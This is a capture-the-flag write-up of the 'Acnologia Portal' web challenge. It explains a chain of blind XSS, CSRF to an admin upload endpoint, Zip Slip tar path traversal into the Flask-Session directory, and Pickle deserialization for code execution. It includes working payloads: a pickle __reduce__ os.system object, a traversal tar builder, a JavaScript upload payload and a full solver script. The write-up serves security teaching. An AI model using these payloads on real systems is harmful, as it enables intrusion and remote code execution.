CA CTF 2022: Exploiting Zip Slip and Pickle Deserialization - Acnologia Portal

Exploiting Zip Slip and Pickle Deserialization, Rayhan0x01 shares his write-up of Acnologia Portal from Cyber Apocalypse CTF 2022.

Rayhan0x01,
Jan 15
2022

In this write-up, we'll go over the web challenge Acnologia Portal, rated as medium difficulty in the Cyber Apocalypse CTF 2022. The solution requires exploiting a blind XSS vulnerability to perform CSRF and upload a malicious archive that writes a file to an arbitrary location, then crafting a Flask-Session cookie that triggers Pickle deserialization of that file to gain remote code execution.

Challenge Description 📄

Bonnie has confirmed the location of the Acnologia spacecraft operated by the Golden Fang mercenary. Before taking over the spaceship, we need to disable its security measures. Ulysses discovered an accessible firmware management portal for the spacecraft. Can you help him get in?

The application at-a-glance 🔍

The application homepage displays a login form and a link to the registration page. Since we don't have an account, we can create an account via the registration page and log in. After logging in, the application redirects to the following dashboard page:

We can click one of the "Report A Bug" buttons which brings up a form to submit a message:

Submitting an issue sends the following API request to the backend:

Those are all the features accessible to a regular user in this web application. Since the source code is given for this application, we can take a look at the application routing in the blueprints/route.py file and see all the available endpoints:

@web.route('/', methods=['GET'])
def login():
...
 
@api.route('/login', methods=['POST'])
def user_login():
...
 
@api.route('/register', methods=['POST'])
def user_registration():
...
 
@web.route('/dashboard')
@login_required
def dashboard():
...
 
@api.route('/firmware/list', methods=['GET'])
@login_required
def firmware_list():
...
 
@api.route('/firmware/report', methods=['POST'])
@login_required
def report_issue():
...
 
@api.route('/firmware/upload', methods=['POST'])
@login_required
@is_admin
def firmware_update():
...
 
@web.route('/review', methods=['GET'])
@login_required
@is_admin
def review_report():
...
 
@web.route('/logout')
@login_required
def logout():
...

It looks like there are additional endpoints that only the admin user can access. Looking at the Dockerfile, we can see the flag is placed under /root/flag, and a binary named readflag is created and given SUID permissions to be executed as root. A new user account called www is created that runs the Flask web application:

# Copy flag
COPY flag.txt /root/flag
 
# Add readflag binary
COPY config/readflag.c /
RUN gcc -o /readflag /readflag.c && chmod 4755 /readflag && rm /readflag.c
 
# add user
RUN adduser -D -u 1000 -g 1000 -s /bin/sh www
 
# Setup app
RUN mkdir -p /app
 
# Switch working environment
WORKDIR /app
 
# Add application
COPY challenge .
RUN chown -R www: /app/flask_session

This suggests the only way to get the challenge flag is to somehow gain remote code execution by exploiting the application and executing the readflag binary.

Finding blind XSS via source code review 🔬

To understand what is done with the reported issues we submit, we can start by reviewing the /firmware/report endpoint defined in the application/routes.py file:

@api.route('/firmware/report', methods=['POST'])
@login_required
def report_issue():
   if not request.is_json:
       return response('Missing required parameters!'), 401
 
   data = request.get_json()
   module_id = data.get('module_id', '')
   issue = data.get('issue', '')
 
   if not module_id or not issue:
       return response('Missing required parameters!'), 401
 
   new_report = Report(module_id=module_id, issue=issue, reported_by=current_user.username)
   db.session.add(new_report)
   db.session.commit()
 
   visit_report()
   migrate_db()
 
   return response('Issue reported successfully!')

The reported issue content is saved to the database, and two different functions are called before returning the response. The visit_report() function defined in the application/bot.py launches a headless Chrome browser and authenticates as the admin user on the platform before visiting the /review endpoint:

<snip>
client = webdriver.Chrome(chrome_options=chrome_options)
client.set_page_load_timeout(5)
client.set_script_timeout(5)
 
client.get('http://localhost:1337/')
 
username = client.find_element_by_id('username')
password = client.find_element_by_id('password')
login = client.find_element_by_id('login-btn')
 
username.send_keys(current_app.config['ADMIN_USERNAME'])
password.send_keys(current_app.config['ADMIN_PASSWORD'])
login.click()
time.sleep(3)
 
client.get('http://localhost:1337/review')
 
time.sleep(3)
client.quit()

The review endpoint is protected by the is_admin wrapper defined in application/util.py, which makes sure the request originates from the IP address 127.0.0.1 and that the username matches the ADMIN_USERNAME value:

def is_admin(f):
   @functools.wraps(f)
   def wrap(*args, **kwargs):
       if current_user.username == current_app.config['ADMIN_USERNAME'] and request.remote_addr == '127.0.0.1':
           return f(*args, **kwargs)
       else:
           return abort(401)
 
   return wrap

Checking the application/templates/review.html file, we see that the jinja2 templating engine filter safe is used on the user-supplied parameter issue:

<p class="card-text">Issue : {{ report.issue | safe }} </p>

As described in the Jinja2 templating docs, a value marked as safe is rendered without escaping, so any HTML or JavaScript in the issue field reaches the admin's browser intact, leading to a cross-site scripting vulnerability.

We can verify the XSS vulnerability by submitting an issue with the following XSS payload that tries to fetch the image link we control when the headless Chrome bot visits the /review endpoint:

The webhook.site website is a request logger service that provides a public link and stores and displays any requests made to that public link. Now that we can execute JavaScript as the "admin" user, we can interact with the other endpoints only accessible to the admin.
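
To make the effect of the safe filter concrete, here is a minimal sketch of such a report body. The webhook URL is a hypothetical placeholder, and html.escape is used only as a rough stand-in for Jinja2's autoescaping (the exact entities Jinja2 emits may differ slightly):

```python
import html
import json

# Hypothetical request-logger URL; substitute the unique link issued by the service.
WEBHOOK_URL = "https://webhook.site/your-unique-id"

# An image tag whose src points at the logger, so rendering it triggers a request.
issue = f'<img src="{WEBHOOK_URL}/xss-check">'

# JSON body for POST /api/firmware/report (field names taken from report_issue()).
report_body = json.dumps({"module_id": 1, "issue": issue})

# With escaping, the markup would be rendered as inert text.
escaped = html.escape(issue)
# With `| safe`, the template emits the value verbatim and the browser parses it as HTML.
unescaped = issue

print(report_body)
print("escaped:  ", escaped)
print("unescaped:", unescaped)
```

If the logger records a request shortly after the report is submitted, the markup was rendered unescaped in the bot's browser.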

The Zip Slip attack via firmware upload 🤐

The /api/firmware/upload endpoint defined in application/routes.py is only accessible to the admin:

@api.route('/firmware/upload', methods=['POST'])
@login_required
@is_admin
def firmware_update():
   if 'file' not in request.files:
       return response('Missing required parameters!'), 401
 
   extraction = extract_firmware(request.files['file'])
   if extraction:
       return response('Firmware update initialized successfully.')
 
   return response('Something went wrong, please try again!'), 403

The endpoint accepts POST requests and passes the uploaded file to the extract_firmware function defined in application/util.py. That function first saves the file to the system's temporary directory and checks whether it is a tar file. If so, it opens the archive and extracts its entire contents using the extractall() method:

def extract_firmware(file):
   tmp  = tempfile.gettempdir()
   path = os.path.join(tmp, file.filename)
   file.save(path)
 
   if tarfile.is_tarfile(path):
       tar = tarfile.open(path, 'r:gz')
       tar.extractall(tmp)
 
       rand_dir = generate(15)
       extractdir = f"{current_app.config['UPLOAD_FOLDER']}/{rand_dir}"
       os.makedirs(extractdir, exist_ok=True)
       for tarinfo in tar:
           name = tarinfo.name
           if tarinfo.isreg():
               try:
                   filename = f'{extractdir}/{name}'
                   os.rename(os.path.join(tmp, name), filename)
                   continue
               except:
                   pass
           os.makedirs(f'{extractdir}/{name}', exist_ok=True)
       tar.close()
       return True
 
   return False

A root folder with a random name is created inside the /static/archives directory, where all the tar items are to be saved. The extracted tar items are then iterated over: regular files are moved into the root folder, and any other item, such as a directory, is created inside it. Let's take a look at the documentation for the TarFile.extractall() method. We can see the following warning, which states it's possible to create files in arbitrary locations by specifying ".." in paths:

This vulnerability is widely known as the Zip Slip Vulnerability. We can craft an XSS payload that will perform cross-site request forgery (CSRF) by sending an API request to upload the tar file to that endpoint. The problem now is what file to overwrite to gain remote code execution!
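
To see why ".." in a member name matters, the following sketch resolves member names against an extraction directory the same way a naive extractor would. The helper names and the /tmp base directory are assumptions made for illustration; nothing is written to disk:

```python
import posixpath


def resolve_member(base_dir: str, member_name: str) -> str:
    """Return the normalized path a member would be written to under base_dir."""
    return posixpath.normpath(posixpath.join(base_dir, member_name))


def escapes_base(base_dir: str, member_name: str) -> bool:
    """True when the resolved path falls outside base_dir."""
    base = posixpath.normpath(base_dir)
    target = resolve_member(base, member_name)
    return posixpath.commonpath([base, target]) != base


base = "/tmp"  # assumed value of tempfile.gettempdir() in the container
benign = "firmware/module.bin"
hostile = "../../../../../app/flask_session/payload"

print(resolve_member(base, benign), escapes_base(base, benign))
print(resolve_member(base, hostile), escapes_base(base, hostile))
```

The benign name stays under the base directory, while the hostile one resolves to a path under /app/flask_session. Extra "../" segments are harmless because the path cannot climb above the filesystem root.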

Flask-Session cookie Pickle deserialization 🥒

If we launch the challenge application locally and inspect the /app directory, we will see that we don't have permission to write or modify any files in the application directory. However, the `flask_session` directory is owned by the www user, where we can create arbitrary files:

drwxrwxr-x    5 root     root          4096 May  9 16:28 application
drwxrwxr-x    1 www      www           4096 May 17 21:54 flask_session
-rw-rw-r--    1 root     root           185 May  9 16:28 run.py

Looking into the application/config.py file, we can see a few config keys related to the flask-session library:

SESSION_PERMANENT = False
SESSION_TYPE = 'filesystem'
SESSION_KEY_PREFIX = ''
SESSION_FILE_THRESHOLD = 20
SESSION_USE_SIGNER = False

From the flask-session documentation, the SESSION_USE_SIGNER key is described as follows:

Whether sign the session cookie sid or not, if set to True, you have to set flask.Flask.secret_key, default to be False

Since the SESSION_TYPE is set to filesystem, whenever we log in to the application, a new session file is created in the /app/flask_session folder. The filename is calculated as the MD5 hash of the session cookie sid. If we look at the source code of the flask-session library, we'll see the filesystem session type uses the class FileSystemSessionInterface:

class FileSystemSessionInterface(SessionInterface):
   """Uses the :class:`cachelib.file.FileSystemCache` as a session backend.
   .. versionadded:: 0.2
       The `use_signer` parameter was added.
   :param cache_dir: the directory where session files are stored.
   :param threshold: the maximum number of items the session stores before it
                       starts deleting some.
   :param mode: the file mode wanted for the session files, default 0600
   :param key_prefix: A prefix that is added to FileSystemCache store keys.
   :param use_signer: Whether to sign the session id cookie or not.
   :param permanent: Whether to use permanent session or not.
   """
 
   session_class = FileSystemSession

The FileSystemCache class from the cachelib library saves the session, using the SESSION_KEY_PREFIX followed by the session `sid` value as the key. Looking into the FileSystemCache class:

 
class FileSystemCache(BaseCache):
   """A cache that stores the items on the file system.  This cache depends
   on being the only user of the `cache_dir`.  Make absolutely sure that
   nobody but this cache stores files there or otherwise the cache will
   randomly delete files therein.
   :param cache_dir: the directory where cache files are stored.
   :param threshold: the maximum number of items the cache stores before
                     it starts deleting some. A threshold value of 0
                     indicates no threshold.
   :param default_timeout: the default timeout that is used if no timeout is
                           specified on :meth:`~BaseCache.set`. A timeout of
                           0 indicates that the cache never expires.
   :param mode: the file mode wanted for the cache files, default 0600
   :param hash_method: Default hashlib.md5. The hash method used to
                       generate the filename for cached results.
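
As the hash_method parameter suggests, the on-disk filename is a hash of the cache key. A minimal sketch of that mapping follows, assuming the key is the key prefix followed by the sid, encoded as UTF-8. The session_file_path helper is hypothetical and not part of cachelib or flask-session:

```python
import hashlib
import posixpath


def session_file_path(sid: str,
                      cache_dir: str = "/app/flask_session",
                      key_prefix: str = "") -> str:
    """Predict where the session file for a given sid would be stored."""
    key = key_prefix + sid                      # SESSION_KEY_PREFIX is '' in this challenge
    digest = hashlib.md5(key.encode("utf-8")).hexdigest()
    return posixpath.join(cache_dir, digest)


path = session_file_path("ABC123")
print(path)
```

Because the cookie is not signed (SESSION_USE_SIGNER is False), whoever chooses the sid also knows which file the application will try to load.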

The default hash_method used to generate the filename is MD5. So, if we provide a session cookie "session=ABC123" in our HTTP request, the application looks for the session file at /app/flask_session/MD5(ABC123) by default. The second thing to notice from this class is that the serializer used to save and load the data from the files is acquired by calling the FileSystemSerializer() class:

 
class BaseSerializer:
   """This is the base interface for all default serializers.
   BaseSerializer.load and BaseSerializer.dump will
   default to pickle.load and pickle.dump. This is currently
   used only by FileSystemCache which dumps/loads to/from a file stream.
   """
 
   def _warn(self, e: pickle.PickleError) -> None:
       logging.warning(
           f"An exception has been raised during a pickling operation: {e}"
       )
 
   def dump(
       self, value: int, f: _t.IO, protocol: int = pickle.HIGHEST_PROTOCOL
   ) -> None:
       try:
           pickle.dump(value, f, protocol)
       except (pickle.PickleError, pickle.PicklingError) as e:
           self._warn(e)
 
   def load(self, f: _t.BinaryIO) -> _t.Any:
       try:
           data = pickle.load(f)
       except pickle.PickleError as e:
           self._warn(e)
           return None
       else:
           return data
 
   """BaseSerializer.loads and BaseSerializer.dumps
   work on top of pickle.loads and pickle.dumps. Dumping/loading
   strings and byte strings is the default for most cache types.
   """
 
   def dumps(self, value: _t.Any, protocol: int = pickle.HIGHEST_PROTOCOL) -> bytes:
       try:
           serialized = pickle.dumps(value, protocol)
       except (pickle.PickleError, pickle.PicklingError) as e:
           self._warn(e)
       return serialized
 
   def loads(self, bvalue: bytes) -> _t.Any:
       try:
           data = pickle.loads(bvalue)
       except pickle.PickleError as e:
           self._warn(e)
           return None
       else:
           return data
<snip>
class FileSystemSerializer(BaseSerializer):
   """Default serializer for FileSystemCache."""

If we go back to the FileSystemCache class, the FileSystemCache.get() method defined on line 191 reads the file from disk and interprets its first four bytes as an expiry timestamp (pickle_time). If that value is zero or not yet in the past, the rest of the file is deserialized with the self.serializer.load() method:

 
def get(self, key: str) -> _t.Any:
   filename = self._get_filename(key)
   try:
       with self._safe_stream_open(filename, "rb") as f:
           pickle_time = struct.unpack("I", f.read(4))[0]
           if pickle_time == 0 or pickle_time >= time():
               return self.serializer.load(f)
   except FileNotFoundError:
       pass
   except (OSError, EOFError, struct.error):
       logging.warning(
           "Exception raised while handling cache file '%s'",
           filename,
           exc_info=True,
       )
   return None

We can read from the Pickle documentation that insecure deserialization can lead to remote code execution. To pass the four-byte check, we can prepend four zero bytes to the serialized pickle payload:

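import os, pickle, struct

class RCE:
    def __reduce__(self):
        # Command that os.system runs when the payload is unpickled
        cmd = '/readflag > /app/application/static/flag.txt'
        return os.system, (cmd,)
# Four zero bytes satisfy the pickle_time == 0 branch in FileSystemCache.get()
pickle_time = struct.pack("I", 0)
pickled_payload = pickle_time + pickle.dumps(RCE())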
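
The same mechanics can be tried safely with a benign callable. The sketch below is a simplified, in-memory imitation of the header check from FileSystemCache.get(), not the library code itself. The Harmless class and the load_like_cache helper are hypothetical names:

```python
import io
import pickle
import struct
import time


class Harmless:
    """Stand-in for the RCE class: __reduce__ names a callable to run on load."""

    def __reduce__(self):
        # A benign builtin replaces os.system for this demonstration.
        return len, ("unpickled",)


def load_like_cache(raw: bytes):
    """Mimic the four-byte timestamp check on in-memory bytes."""
    f = io.BytesIO(raw)
    pickle_time = struct.unpack("I", f.read(4))[0]
    if pickle_time == 0 or pickle_time >= time.time():
        return pickle.load(f)   # the callable from __reduce__ runs here
    return None


zero_header = struct.pack("I", 0)      # treated as "never expires"
expired_header = struct.pack("I", 1)   # a timestamp far in the past

result = load_like_cache(zero_header + pickle.dumps(Harmless()))
skipped = load_like_cache(expired_header + pickle.dumps(Harmless()))
print(result, skipped)
```

With the zero header the callable runs during loading and its return value comes back, while the expired header causes the file to be ignored.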

Here's how to create the Zip Slip archive with the Pickle payload in Python:

zipslip = io.BytesIO()
tar = tarfile.open(fileobj=zipslip, mode='w:gz')
info = tarfile.TarInfo(f'../../../../../app/flask_session/{filename}')
info.mtime = time.time()
info.size = len(pickled_payload)
tar.addfile(info, io.BytesIO(pickled_payload))
tar.close()
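
Before sending the archive, it can be useful to read it back and confirm the member name survived intact. This is a self-contained sketch with a placeholder payload and an example sid, both of which are assumptions for illustration:

```python
import hashlib
import io
import tarfile
import time

payload = b"\x00\x00\x00\x00placeholder"           # stand-in for the pickled payload
filename = hashlib.md5(b"example-sid").hexdigest()  # example sid, not the real one

# Build the archive in memory with a traversal path as the member name.
buf = io.BytesIO()
with tarfile.open(fileobj=buf, mode="w:gz") as tar:
    info = tarfile.TarInfo(f"../../../../../app/flask_session/{filename}")
    info.mtime = int(time.time())
    info.size = len(payload)
    tar.addfile(info, io.BytesIO(payload))

# Reopen the archive and list what an extractor would see.
buf.seek(0)
with tarfile.open(fileobj=buf, mode="r:gz") as tar:
    members = [(m.name, m.size, m.isreg()) for m in tar.getmembers()]

print(members)
```

The member is a regular file whose name still starts with "../", which is what lets extraction place it outside the temporary directory.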

Preparing the final exploit sorcery 🧙

We'll use the cross-site scripting vulnerability to perform CSRF on the /api/firmware/upload endpoint to upload the Zip Slip payload for extraction. The extraction will place the pickle serialized RCE payload in the flask_session directory. Finally, we'll trigger the deserialization by visiting the application with a session cookie sid that matches the md5 filename of the payload. Here's the full-chain solver script:

#!/usr/bin/env python3
import sys, requests, base64, time, tarfile, io, os, pickle, hashlib, struct

hostURL = 'http://127.0.0.1:1337'               # Challenge host URL
userName = 'rh0x01'                             # new username
userPwd = 'rh0x01'                              # new password

def register():
    jData = { 'username': userName, 'password': userPwd }
    req_stat = requests.post(f'{hostURL}/api/register', json=jData).status_code
    if not req_stat == 200:
        print("Something went wrong! Is the challenge host live?")
        sys.exit()

def login():
    jData = { 'username': userName, 'password': userPwd }
    authCookie = requests.post(f'{hostURL}/api/login', json=jData).cookies.get('session')
    if not authCookie:
        print("Something went wrong while logging in!")
        sys.exit()
    return authCookie

def prepare_zipslip(filename):
    class RCE:
        def __reduce__(self):
            cmd = ('/readflag > /app/application/static/flag.txt')
            return os.system, (cmd,)
    pickle_time = struct.pack("I", 0000)
    pickled_payload = pickle_time + pickle.dumps(RCE())

    zipslip = io.BytesIO()
    tar = tarfile.open(fileobj=zipslip, mode='w:gz')
    info = tarfile.TarInfo(f'../../../../../app/flask_session/{filename}')
    info.mtime = time.time()
    info.size = len(pickled_payload)
    tar.addfile(info, io.BytesIO(pickled_payload))
    tar.close()

    return base64.b64encode(zipslip.getvalue()).decode()


print('[+] Signing up a new account..')
register()

print('[~] Logging in to acquire session cookie..')
cookie = login()

print('[+] Preparing zipslip payload file with matching cookie sid..')
sid = 'rayhan0x01'
filename = hashlib.md5(sid.encode()).hexdigest()
b64_file = prepare_zipslip(filename)

print('[+] Preparing the XSS payload to upload the zipslip..')
xss_payload = """
<script>
const b64Data="%s"
const byteCharacters = atob(b64Data);
const byteArrays = [];
const sliceSize=512;
const contentType='multipart/form-data';
for (let offset = 0; offset < byteCharacters.length; offset += sliceSize) {
const slice = byteCharacters.slice(offset, offset + sliceSize);

const byteNumbers = new Array(slice.length);
for (let i = 0; i < slice.length; i++) {
byteNumbers[i] = slice.charCodeAt(i);
}

const byteArray = new Uint8Array(byteNumbers);
byteArrays.push(byteArray);
}

const blob = new Blob(byteArrays, {type: contentType});

var formData = new FormData();
formData.append('file', blob, 'rh0x01.tar.gz');

var xhr = new XMLHttpRequest();
xhr.open('POST','/api/firmware/upload', true);
xhr.send(formData);
</script>
""" % b64_file

print('[+] Sending bug report with XSS payload..')
requests.post(
    f'{hostURL}/api/firmware/report',
    cookies={"session": cookie},
    json={'module_id': 1, 'issue': xss_payload}
)

print('[+] Triggering Pickle rce..')
flag = ''
while not flag:
    # Re-send the crafted sid on every attempt in case the archive has not been extracted yet
    requests.get(f'{hostURL}/dashboard', cookies={"session": sid})
    flag_resp = requests.get(f'{hostURL}/static/flag.txt')
    if flag_resp.status_code == 200:
        flag = flag_resp.text
    else:
        time.sleep(5)

print(f'[+] Flag: {flag}')

And that's a wrap for the write-up of this challenge! The challenge is currently available to play on the Hack The Box platform.

Challenge Unintendeds 💔

  • The application directory was owned by the www user, allowing the Zip Slip vulnerability to overwrite the HTML template files and gain RCE via Jinja2 SSTI. We patched it by setting the owner of the application directory to root.

  • A malicious archive containing a symlink to the flag file allowed reading the flag without RCE. We patched it by adding a readflag binary with SUID permissions and moving the flag to /root/flag.
